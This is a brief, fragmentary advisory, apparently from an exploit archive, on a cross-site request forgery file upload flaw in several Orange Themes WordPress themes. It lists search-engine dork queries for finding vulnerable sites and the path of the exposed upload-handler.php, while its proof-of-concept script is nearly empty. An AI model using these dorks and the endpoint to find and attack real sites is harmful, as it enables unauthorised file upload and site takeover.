WordPress Orange Themes Cross-Site Request Forgery File Upload Vulnerability


Published: 2013-11.3
Author: JJE Incovers

Vulnerability type: File upload

Description:

Exploitation method
[php]
inurl:"/wp-content/themes/agritourismo-theme/"
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
[/php]
Cross-site request forgery file upload exploitation and PoC

http://0day5.com/wp-content/themes/rockstar-theme/functions/upload-handler.php

Script :
[php]

Your File:

[/php]
